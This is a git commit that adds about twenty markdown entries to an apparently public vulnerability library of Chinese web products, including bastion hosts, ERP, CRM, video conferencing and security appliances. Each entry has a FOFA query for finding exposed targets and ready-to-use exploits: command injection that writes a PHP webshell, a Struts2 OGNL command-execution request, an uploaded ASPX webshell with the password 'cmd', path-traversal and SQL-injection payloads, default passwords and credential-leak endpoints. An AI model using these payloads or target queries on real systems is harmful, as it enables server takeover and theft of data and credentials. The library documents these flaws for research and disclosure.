更新漏洞库:Web应用漏洞/

This commit is contained in:
Threekiii 2022-05-25 15:32:50 +08:00
parent 1a421fad6b
commit e29999ff39
23 changed files with 901 additions and 0 deletions

View File

@ -0,0 +1,63 @@
# 中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞
## 漏洞描述
中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接攻击者通过漏洞可获取服务器权限
## 漏洞影响
```
中远麒麟 iAudit堡垒机
```
## FOFA
```
cert.subject="Baolei"
```
## 漏洞复现
登录页面如下
![image-20220525100240635](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251002739.png)
出现漏洞的文件为 get_luser_by_sshport.php
```
<?php
define('CAN_RUN', 1);
require_once('include/global.func.php');
require_once('include/db_connect.inc.php');
if(empty($_GET['clientip'])){
echo 'no host';
return;
}
if(empty($_GET['clientport'])){
echo 'no port';
return;
}
$cmd = 'sudo perl test.pl '.$_GET['clientip'].' '.$_GET['clientport'];
exec($cmd, $o, $r);
$sql = "SELECT luser FROM sessions WHERE addr='".$_GET['clientip']."' and pid='".$o[0]."' order by sid desc limit 1";
$rs = mysql_query($sql);
$row = mysql_fetch_array($rs);
echo $row['luser'];
?>
```
其中 clientip存在命令拼接 使用 ; 分割命令就可以执行任意命令
Web目录默认为 `/opt/freesvr/web/htdocs/freesvr/audit/`
发送Payload
```
https://xxx.xxx.xxx.xxx/get_luser_by_sshport.php?clientip=1;echo+%27%3C?php%20var_dump(shell_exec($_GET[cmd]));?%3E%27%3E/opt/freesvr/web/htdocs/freesvr/audit/test.php;&clientport=1
```
![image-20220525100301367](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251003398.png)
再访问写入的文件执行命令
![image-20220525100311413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251003445.png)

View File

@ -0,0 +1,32 @@
# 云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞
## 漏洞描述
云时空 社会化商业ERP为 Shiro框架 ,使用了默认的密钥导致了远程命令执行漏洞
## 漏洞影响
```
云时空 社会化商业ERP系统
```
## FOFA
```
title="云时空社会化商业ERP"
```
## 漏洞复现
登录页面
![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251024908.png)
默认密钥为
```
kPH+bIxk5D2deZiIxcaaaA==
```
![image-20220525102542474](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251025549.png)

View File

@ -0,0 +1,31 @@
# 云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞
## 漏洞描述
云时空 社会化商业ERP系统存在SQL注入漏洞攻击者通过漏洞可以获取数据库敏感信息
## 漏洞影响
```
云时空 社会化商业ERP系统
```
## FOFA
```
title="云时空社会化商业ERP"
```
## 漏洞复现
登录页面
![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251026873.png)
使用SQLmap验证漏洞
```
sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin"
```
![image-20220525103355733](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251033940.png)

View File

@ -0,0 +1,33 @@
# 众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞
## 漏洞描述
众望网络 微议管理系统 后台updatefile.html页面任意文件上传漏洞攻击者通过漏洞可以上传恶意文件控制服务器
## 漏洞影响
```
众望网络 微议管理系统
```
## FOFA
```
"微议管理系统"
```
## 漏洞复现
登录页面
![image-20220525103602413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251036461.png)
默认口令 amdin/admin, 服务器更新界面上传PHP文件
![image-20220525103740928](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251037014.png)
访问页面
```
/Updatefiles/文件名.php
```

View File

@ -0,0 +1,57 @@
# 信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞
## 漏洞描述
信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 对应的ping功能存在后台命令执行漏洞通过默认口令可以获取系统权限
## 漏洞影响
```
信诺瑞得 WiseGrid慧敏应用交付网关
```
## FOFA
```
app="WiseGrid慧敏应用交付网关"
```
## 漏洞复现
登录页面
![image-20220525143430650](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251434774.png)
默认口令
```
sshroot/sinogrid
web: admin/sinogrid
```
```
![2](C:/Users/47236/Desktop/2.png)![2](C:/Users/47236/Desktop/2.png)POST /bin/sysadmin_action.php?action=getinfo&operation=ping&destination_value=`id`&ping_count=3&sar_value=3&netstat_value=tcp&interface= HTTP/1.1
Host:
Cookie: PHPSESSID=4510o12llugti8k4f24971rdf2; funcs=NNN; appversion=WiseGrid-V4.2.2R_17322; hbstate=alone; username=admin; passwordmd5=ef9ffdf6c1e2fe91d4e14b30323fb771; role=superadmin; authmode=LOCAL; session_time=1639643323; lang=zh; declaration=1; needSyn=false
Content-Length: 0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96"
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Connection: close
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251433134.png)
![]()![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251434769.png)

View File

@ -0,0 +1,29 @@
# 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞
## 漏洞描述
杭州吉拉科技有限公司多个系统存在目录遍历漏洞,由于 /Business/ 访问控制不严,攻击者可利用该漏洞获取敏感信息。
## 漏洞影响
吉拉科技 LVS精益价值管理系统
## FOFA
```
"Supperd By 吉拉科技"
```
## 漏洞复现
登录页面
![image-20220525143613247](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251436458.png)
验证POC
```
/Business/
```
![image-20220525143712687](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251437757.png)

View File

@ -0,0 +1,31 @@
# 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞
## 漏洞描述
昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞
## 漏洞影响
```
昆石网络 VOS3000虚拟运营支撑系统
```
## FOFA
```
app="VOS-VOS3000"
```
## 漏洞复现
登录页面
![image-20220525144202606](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251442673.png)
验证POC
```
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251443278.png)

View File

@ -0,0 +1,31 @@
# 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
## 漏洞描述
汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
## 漏洞影响
```
汇文v5.6
```
## FOFA
```
app="汇文软件-书目检索系统"
```
## 漏洞复现
主页面
![image-20220525144642895](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251446991.png)
验证POC
```
/include/config.properties
```
![image-20220525144530183](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251445229.png)

View File

@ -0,0 +1,31 @@
# 深信服 应用交付报表系统 download.php 任意文件读取漏洞
## 漏洞描述
深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞攻击者通过漏洞可以下载服务器任意文件
## 漏洞影响
```
深信服 应用交付报表系统
```
## FOFA
```
app="SANGFOR-应用交付报表系统"
```
## 漏洞复现
登录页面
![image-20220525144847811](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251448956.png)
验证POC
```
/report/download.php?pdf=../../../../../etc/passwd
```
![image-20220525144958637](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251449708.png)

View File

@ -0,0 +1,31 @@
# 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞
## 漏洞描述
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问导致账号密码泄漏
## 漏洞影响
```
深信服 应用交付管理系统
```
## FOFA
```
app="SANGFOR-应用交付管理系统"
```
## 漏洞复现
登录页面
![image-20220525145113865](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451936.png)
验证POC
```
/tmp/updateme/sinfor/ad/sys/sys_user.conf
```
![image-20220525145136819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451862.png)

View File

@ -0,0 +1,37 @@
# 畅捷CRM get_usedspace.php SQL注入漏洞
## 漏洞描述
畅捷CRM get_usedspace.php存在SQL漏洞通过漏洞可获取数据库敏感信息
## 漏洞影响
```
畅捷CRM
```
## FOFA
```
title="畅捷CRM"
```
## 漏洞复现
登录页面
![image-20220525145239822](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251452933.png)
验证POC
```
/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)--
```
![image-20220525145324633](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251453704.png)
使用Sqlmap验证漏洞
```
sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id
```

View File

@ -0,0 +1,31 @@
# 科达 MTS转码服务器 任意文件读取漏洞
## 漏洞描述
KEDACOM MTS转码服务器存在任意文件读取漏洞攻击这通过漏洞可以读取服务器任意信息
## 漏洞影响
```
MTS转码服务器
```
## FOFA
```
app="MTS转码服务器"
```
## 漏洞复现
登录页面
![image-20220525145422524](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454625.png)
验证POC
```
/../../../../../../../../etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454380.png)

View File

@ -0,0 +1,31 @@
# 科达 网络键盘控制台 任意文件读取漏洞
## 漏洞描述
KEDACOM 网络键盘控制台存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
## 漏洞影响
```
KEDACOM 网络键盘控制台
```
## FOFA
```
"网络键盘控制台"
```
## 漏洞复现
登录页面
![image-20220525145610413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456491.png)
验证POC
```
/../../../../../../../../etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456381.png)

View File

@ -0,0 +1,31 @@
# 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638
## 漏洞描述
紫光软件系统有限公司以下简称“紫光软件”是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
## 漏洞影响
```
紫光电子档案管理系统
```
## FOFA
```
app="紫光档案管理系统"
```
## 漏洞复现
登录页面
![image-20220525145742607](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251457947.png)
验证POC
```
/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1)))
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251458637.png)

View File

@ -0,0 +1,39 @@
# 绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞
## 漏洞描述
绿盟 BAS日志数据安全性分析系统存在未授权访问漏洞通过漏洞可以添加任意账户登录平台获取敏感信息
## 漏洞影响
```
绿盟 BAS日志数据安全性分析系统
```
## FOFA
```
body="WebApi/encrypt/js-sha1/build/sha1.min.js"
```
## 漏洞复现
登录页面
![image-20220525145937586](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251459725.png)
未授权页面
```
/accountmanage/index
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500626.png)
添加用户并登录
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500966.png)
使用账户登录后台
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500218.png)

View File

@ -0,0 +1,46 @@
# 绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞
## 漏洞描述
绿盟 UTS综合威胁探针 某个接口未做授权导致未授权漏洞
## 漏洞影响
```
绿盟 UTS综合威胁探针
```
## FOFA
```
app="NSFOCUS-UTS综合威胁探针"
```
## 漏洞复现
默认口令
```
admin/Nsfocus@123
auditor/auditor
```
登陆页面
![image-20220525150142447](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251501583.png)
验证POC
```
/webapi/v1/system/accountmanage/account
```
![image-20220525150243440](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251502510.png)
这里出现了登录的账号以及加密的 PASS
登陆时的加密字段抓包修改为获取的就可以登陆系统
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503644.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503926.png)

View File

@ -0,0 +1,67 @@
# 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞
## 漏洞描述
金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件
## 漏洞影响
```
金山 V8 终端安全系统
```
## FOFA
```
title="在线安装-V8+终端安全系统Web控制台"
```
## 漏洞复现
登录页面
![image-20220525150449778](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251504895.png)
存在漏洞的文件`/Console/receive_file/get_file_content.php`
```
<?php
if(stripos($_POST['filepath'],"..") !== false) {
echo 'no file founggd';
exit();
}
ini_set("open_basedir", "../");
$file_path = '../'.iconv("utf-8","gb2312",$_POST['filepath']);
if(!file_exists($file_path)){
echo 'no file founggd';
exit();
}
$fp=fopen($file_path,"r");
$file_size=filesize($file_path);
$buffer=5024;
$file_count=0;
while(!feof($fp) && $file_count<$file_size){
$file_con=fread($fp,$buffer);
$file_count+=$buffer;
echo $file_con;
}
fclose($fp);
?>
```
文件中没有任何的过滤 通过 filepaht 参数即可下载任意文件
由于不能出现 `..` 所以只能读取web目录下的文件
```
POST /receive_file/get_file_content.php
filepath=login.php
```
![image-20220525150700239](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251507315.png)

View File

@ -0,0 +1,35 @@
# 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336
## 漏洞描述
金笛 短信中间件Web版后台存在任意文件下载漏洞攻击者通过漏洞可以获取服务器任意文件信息
## 漏洞影响
```
金笛 短信中间件Web版
```
## FOFA
```
app="金笛短信中间件(WEB版)"
```
## 漏洞复现
登录页面
![image-20220525150803211](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508287.png)
存在漏洞的位置为 日志下载
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508351.png)
验证POC
```
/log?action=view&pageIndex=1&name=../../../windows/win.ini
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508651.png)

View File

@ -0,0 +1,31 @@
# 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞
## 漏洞描述
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件
## 漏洞影响
```
银达汇智 智慧综合管理平台
```
## FOFA
```
"汇智信息" && title="智慧综合管理平台登入"
```
## 漏洞复现
登陆页面
![image-20220525150952244](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251509315.png)
验证POC
```
/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config
```
![image-20220525151256759](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251512861.png)

View File

@ -0,0 +1,58 @@
# 银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞
## 漏洞描述
银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件
## 漏洞影响
```
银达汇智 智慧综合管理平台
```
## FOFA
```
"汇智信息" && title=="智慧综合管理平台登入"
```
## 漏洞复现
登陆页面
![image-20220525150952244](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514171.png)
文件上传请求包
```
POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1
Host:
Accept-Encoding: identity
Content-Length: 337
Accept-Language: zh-CN,zh;q=0.8
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9
--62907949903a4c499178971c9dab4ad9
Content-Disposition: form-data; name="Filedata"; filename="abc.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript"%><%Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("abc", "MD5").ToLower());eval(Request.Item["cmd"],"unsafe");%>
--62907949903a4c499178971c9dab4ad9--
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514756.png)
响应包会返回文件名,上传的目录为
```
/imgnews/imgcontent/1/xxxxxxxxxx.aspx
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514939.png)
出现如图成功上传木马,密码为 `cmd`

View File

@ -0,0 +1,51 @@
# 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113
## 漏洞描述
零视技术(上海)有限公司是以领先的视频技术服务于客户致力于物联网视频开发简单化依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口执行未授权操作。
## 漏洞影响
```
零视科技 H5S视频平台
```
## FOFA
```
title="H5S视频平台|WEB"
```
## 漏洞复现
登录页面
![image-20220525151716667](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251517010.png)
API文档可以未授权访问
```
/doc/api.html
```
![image-20220525151757329](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251517406.png)
存在用户账号密码泄漏的接口
```
/api/v1/GetUserInfo?user=admin&session=
```
![image-20220525151838220](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251518256.png)
其中登录接口中 Password为接口中存在的账号密码可以直接发送请求获取Cookie
```
/api/v1/Login?user=admin&password=827ccb0eea8a706c4c34a16891f84e7b
```
![image-20220525151916076](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251519118.png)
请求成功后访问主页面
![image-20220525152043207](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251520302.png)

View File

@ -0,0 +1,44 @@
# 飞视美 视频会议系统 Struts2 远程命令执行漏洞
## 漏洞描述
飞视美 视频会议系统 Struts2组件存在远程命令执行漏洞通过漏洞攻击者可执行任意命令获取服务器权限
## 漏洞影响
```
飞视美 视频会议系统
```
## FOFA
```
app="飞视美-视频会议系统"
```
## 漏洞复现
登录页面
![image-20220525152447274](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251524392.png)
存在漏洞的路径为
```
/confinfoaction!showallConfinfos.action
```
发送请求包
```
POST /confinfoaction!showallConfinfos.action HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 669
Host:
Connection: Keep-Alive
('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ipconfig\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d))
```
![image-20220525152728933](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251527012.png)

View File

@ -0,0 +1,31 @@
# 魅课 OM视频会议系统 proxy.php 文件包含漏洞
## 漏洞描述
魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。
## 漏洞影响
```
魅课OM视频会议系统
```
## FOFA
```
app="OMEETING-OM视频会议"
```
## 漏洞复现
登录页面
![image-20220525153028849](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251530024.png)
验证POC
```
/admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini
```
![image-20220525153105283](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251531338.png)